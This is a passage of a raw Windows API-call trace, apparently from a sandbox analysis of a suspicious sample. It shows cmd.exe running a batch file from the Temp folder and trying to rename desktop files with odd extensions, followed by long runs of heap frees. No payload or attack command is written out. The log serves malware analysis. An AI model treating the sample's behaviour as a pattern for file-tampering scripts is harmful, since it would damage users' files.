hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0202.947] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] GetFileType (hFile=0x50) returned 0x2 [0202.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.947] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0202.952] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.952] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.952] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.952] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.952] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.952] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.953] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.953] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.953] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.953] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.953] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.953] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.953] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.953] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.953] ??_V@YAXPEAX@Z () returned 0x1 [0202.953] GetProcessHeap () returned 0x21ed8c70000 [0202.953] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9a76070 [0202.953] GetProcessHeap () returned 0x21ed8c70000 [0202.953] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a76070, Size=0x130) returned 0x21ed9a76070 [0202.953] GetProcessHeap () returned 0x21ed8c70000 [0202.953] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a76070) returned 0x130 [0202.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.953] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.953] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.953] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.953] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed979fc40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.954] ??_V@YAXPEAX@Z () returned 0x1 [0202.954] GetProcessHeap () returned 0x21ed8c70000 [0202.954] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6bbb0 [0202.955] GetProcessHeap () returned 0x21ed8c70000 [0202.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9a761b0 [0202.955] GetProcessHeap () returned 0x21ed8c70000 [0202.955] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a761b0, Size=0x130) returned 0x21ed9a761b0 [0202.955] GetProcessHeap () returned 0x21ed8c70000 [0202.955] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a761b0) returned 0x130 [0202.955] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.955] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.955] GetProcessHeap () returned 0x21ed8c70000 [0202.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14c40 [0202.955] GetProcessHeap () returned 0x21ed8c70000 [0202.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9576030 [0202.955] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.973] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.973] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.973] GetLastError () returned 0x2 [0202.973] GetProcessHeap () returned 0x21ed8c70000 [0202.973] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9ac70d0 [0202.973] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9ac70e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.973] SetErrorMode (uMode=0x0) returned 0x0 [0202.973] SetErrorMode (uMode=0x1) returned 0x0 [0202.973] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed979fc40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0202.974] SetErrorMode (uMode=0x0) returned 0x1 [0202.974] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0202.974] GetProcessHeap () returned 0x21ed8c70000 [0202.974] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9577140 [0202.974] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.974] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.974] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.974] GetLastError () returned 0x2 [0202.974] ??_V@YAXPEAX@Z () returned 0x1 [0202.974] malloc (_Size=0xffce) returned 0x21ed979fc40 [0202.974] ??_V@YAXPEAX@Z () returned 0x21ed979fc40 [0202.974] malloc (_Size=0xffce) returned 0x21ed97afc20 [0202.974] ??_V@YAXPEAX@Z () returned 0x21ed97afc20 [0202.974] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.975] GetLastError () returned 0x2 [0202.975] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.975] GetFileType (hFile=0x54) returned 0x2 [0202.975] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0202.975] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0202.976] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.976] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0202.977] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.977] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.977] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0202.983] longjmp () [0202.983] ??_V@YAXPEAX@Z () returned 0x1 [0202.983] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="_zyi016uyI EccZobgM.pptx", cAlternateFileName="")) returned 0 [0202.984] GetLastError () returned 0x12 [0202.984] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0202.984] GetProcessHeap () returned 0x21ed8c70000 [0202.984] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95700) returned 1 [0202.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.984] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0202.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.985] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0202.985] _get_osfhandle (_FileHandle=0) returned 0x4c [0202.986] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0202.986] SetConsoleInputExeNameW () returned 0x1 [0202.986] GetConsoleOutputCP () returned 0x1b5 [0202.987] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0202.987] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.988] ??_V@YAXPEAX@Z () returned 0x1 [0202.988] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0202.988] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0202.988] _get_osfhandle (_FileHandle=3) returned 0x98 [0202.988] SetFilePointer (in: hFile=0x98, lDistanceToMove=320, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x140 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577140) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ac70d0) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9576030) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14c40) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a761b0) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6bbb0) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a76070) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.989] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67930) returned 1 [0202.989] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9572840) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571dc0) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571940) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9579a70) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9579a30) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a75fa0) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14ca0) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95769f0) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ab70e0) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9573930) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.990] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14f40) returned 1 [0202.990] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a75f00) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a55e60) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a55dc0) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937a870) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6e900) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ab6ed0) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ab6e90) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ab6bf0) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6e5e0) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ab69e0) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9ab69a0) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.991] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9575400) returned 1 [0202.991] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9aa69b0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95762a0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14dc0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a55c80) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a2b0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a55b40) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d676b0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9572300) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9572a80) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9572540) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9579590) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9579550) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a55a70) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a145e0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9575670) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.992] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a969c0) returned 1 [0202.992] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9574a40) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14ac0) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a559e0) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379a50) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6da70) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937ae70) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ebd0) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9579380) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9579340) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95790a0) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ec20) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9578ed0) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9578e90) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.993] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9575b50) returned 1 [0202.993] GetProcessHeap () returned 0x21ed8c70000 [0202.994] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a86450) returned 1 [0202.996] GetProcessHeap () returned 0x21ed8c70000 [0202.996] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9575dc0) returned 1 [0202.996] GetProcessHeap () returned 0x21ed8c70000 [0202.996] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14880) returned 1 [0202.996] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d930) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6bcf0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d7f0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d673b0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9572c00) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571d00) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9572fc0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95789f0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95789b0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d3c0) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14a60) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9574080) returned 1 [0202.997] GetProcessHeap () returned 0x21ed8c70000 [0202.997] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a76460) returned 1 [0202.998] GetProcessHeap () returned 0x21ed8c70000 [0202.998] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95747d0) returned 1 [0202.998] GetProcessHeap () returned 0x21ed8c70000 [0202.998] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14a00) returned 1 [0202.998] GetProcessHeap () returned 0x21ed8c70000 [0202.998] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6de70) returned 1 [0202.998] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a149a0) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c510) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d70) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9578890) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9578850) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95785b0) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e60) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9578490) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9578450) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9576780) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a65f10) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9574560) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14d00) returned 1 [0202.999] GetProcessHeap () returned 